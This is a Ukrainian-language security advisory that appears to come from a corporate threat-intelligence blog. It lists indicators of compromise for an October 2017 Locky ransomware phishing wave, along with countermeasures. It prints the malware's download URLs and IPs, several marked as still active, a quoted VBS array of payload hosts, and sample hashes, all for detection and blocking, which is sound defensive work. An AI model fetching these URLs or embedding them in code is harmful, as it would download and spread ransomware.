178.136.206.128    mrscrowe.net             GET /p66/9hgfdfyr6 HTTP/1.1 HTTP (+) досі активний
40.76.209.29         georginabringas.com   GET /9hgfdfyr6? HTTP/1.1 HTTP (+) досі активний

не активні

69.156.240.29        balzantruck.com         GET /9hgfdfyr6? HTTP/1.1 HTTP (-) не доступний

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_Locky_041017

Доброго дня, панове.

На протязі останніх днів було зафіксовано масові спроби доставки Locky Ransomware (розглядав тут і тут ).

Рівень загрози – середній, для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Доставка – через обфусковані JS та необфусковані VBS скрипти у оболонці 7z та Zip.

Схема атаки:

email > Attach (7z/Zip) > JS / VBS > 2-3 URL > GET > %temp%\random.exe

Маркери IOC:

f17e6d1e-3827-47da-b191-55e94e24c406

5.2.88.79 80 HTTP 300 embutidosanezcar.com GET /jhgf54y6??UuhgwJfbwT=UuhgwJfbwT HTTP/1.1 (-)
194.116.187.130 80 HTTP 387 basedow-bilder.de GET /jhgf54y6??UuhgwJfbwT=UuhgwJfbwT HTTP/1.1 (+)

завантаження >

Filename UuhgwJfbwT3.exe
Size 576KiB (589824 bytes)
SHA256 b38ba4b2328342e46bdb396710161535870a1421819eae171f99a114a3d958a0

I_197975

98.124.251.69 80 HTTP 298 theceocforeporter.com GET /873gfhi3f3r??mywoMVI=mywoMVI HTTP/1.1 (-)
185.119.213.186 80 HTTP 321 sherylbro.net GET /p66/873gfhi3f3r%20robsacks.com/873gfhi3f3r??mywoMVI=mywoMVI HTTP/1.1 (-)

помилка в скрипті, завантаження не проходить, а реальна діюча адреса така:

184.168.92.220 80 HTTP 373 robsacks.com GET /873gfhi3f3r??mywoMVI=mywoMVI HTTP/1.1 (+)

завантаження >

Filename 873gfhi3f3r.exe
Size 576KiB (589824 bytes)
SHA256 5a563e7b4523310c4cacd24956ef84f0af27a3cb6457d662da1db29d48918add

I_980998

98.124.251.69 80 HTTP 298 theceocforeporter.com GET /873gfhi3f3r??NRyvRxz=NRyvRxz HTTP/1.1 (-)
77.122.77.216 80 HTTP 321 sherylbro.net GET /p66/873gfhi3f3r%20robsacks.com/873gfhi3f3r??NRyvRxz=NRyvRxz HTTP/1.1 (-)

помилка в скрипті, завантаження не проходить, а реальна діюча адреса така:

184.168.92.220 80 HTTP 373 robsacks.com GET /873gfhi3f3r??NRyvRxz=NRyvRxz HTTP/1.1 (+)

завантаження >

Filename 873gfhi3f3r.exe
Size 576KiB (589824 bytes)
SHA256 5a563e7b4523310c4cacd24956ef84f0af27a3cb6457d662da1db29d48918add

New Doc 2017-10-02 – Page 3 -8402

86.109.170.198 80 HTTP 296 globoart.es GET /ldjivy$?S(@M?%0F?uPcATUcPa=uPcATUcPa HTTP/1.1 (-)
46.175.146.50 80 HTTP 294 sherylbro.net GET /p66/ldjivy78?uPcATUcPa=uPcATUcPa HTTP/1.1 (-)

New Doc 2017-10-02 – Page 3 -8692

66.71.182.143 80 HTTP 297 maurocesari.it GET /ldjh??L?%01]?M?%0F?wLoxrGw=wLoxrGw HTTP/1.1 (-)
109.86.76.228 80 HTTP 290 sherylbro.net GET /p66/ldjivy78?wLoxrGw=wLoxrGw HTTP/1.1 (+)

завантаження >

Filename wLoxrGw4.exe
Size 595KiB (608768 bytes)
SHA256 70d06bd4e6a91b60bc8515e327fa1f9fb7ac82125e3c8a06359b5bb3f96e48f3

свіжий, необфускований VBS, перевірки коду країни нема

Invoice505122638848637420994974

Plyask = Array("tecnigrafite.com/8etyfh3ni?","derainlay.info/p66/8etyfh3ni","securmailbox.it/8etyfh3ni?")
89.96.90.14 80 HTTP 366 tecnigrafite.com GET /8etyfh3ni? HTTP/1.1
77.123.218.185 80 HTTP 367 derainlay.info GET /p66/8etyfh3ni HTTP/1.1
89.96.90.14 80 HTTP 365 securmailbox.it GET /8etyfh3ni? HTTP/1.1

усі три поки активні

завантаження >

Filename zzXOPtNyW.exe
Size 606KiB (620544 bytes)
SHA256 5ccb49b3a3bb1cf0cbeaebf50ed30344e4b87f19ca2d6dad578d5210de904d65

По зразкам поведінка стандартна – після активації перевірка параметрів системи, шифрування не розпочате, самознищення, мережеві комунікації відсутні.

Що можна було зробити аби уникнути інфікування ?

  1. Завантаження архіву із скриптом можна було завадити через блокування VBS та JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис VBS, JS приманки на диск (розпаковку) можна було попередити заборонивши створення VBS, JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск VBS, JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу WSCript.exe (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

досі активні!

js
194.116.187.130 80 HTTP 387 basedow-bilder.de GET /jhgf54y6??UuhgwJfbwT=UuhgwJfbwT
184.168.92.220 80 HTTP 373 robsacks.com GET /873gfhi3f3r??mywoMVI=mywoMVI
184.168.92.220 80 HTTP 373 robsacks.com GET /873gfhi3f3r??NRyvRxz=NRyvRxz
109.86.76.228 80 HTTP 290 sherylbro.net GET /p66/ldjivy78?wLoxrGw=wLoxrGw
vbs
89.96.90.14 80 HTTP 366 tecnigrafite.com GET /8etyfh3ni? HTTP/1.1
77.123.218.185 80 HTTP 367 derainlay.info GET /p66/8etyfh3ni HTTP/1.1
89.96.90.14 80 HTTP 365 securmailbox.it GET /8etyfh3ni? HTTP/1.1

вже не активні

5.2.88.79 80 HTTP 300 embutidosanezcar.com GET /jhgf54y6??UuhgwJfbwT=UuhgwJfbwT
98.124.251.69 80 HTTP 298 theceocforeporter.com GET /873gfhi3f3r??mywoMVI=mywoMVI
98.124.251.69 80 HTTP 298 theceocforeporter.com GET /873gfhi3f3r??NRyvRxz=NRyvRxz
77.122.77.216 80 HTTP 321 sherylbro.net GET /p66/873gfhi3f3r%20robsacks.com/873gfhi3f3r??NRyvRxz=NRyvRxz
86.109.170.198 80 HTTP 296 globoart.es GET /ldjivy$?S(@M?%0F?uPcATUcPa=uPcATUcPa
46.175.146.50 80 HTTP 294 sherylbro.net GET /p66/ldjivy78?uPcATUcPa=uPcATUcPa
66.71.182.143 80 HTTP 297 maurocesari.it GET /ldjh??L?%01]?M?%0F?wLoxrGw=wLoxrGw

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR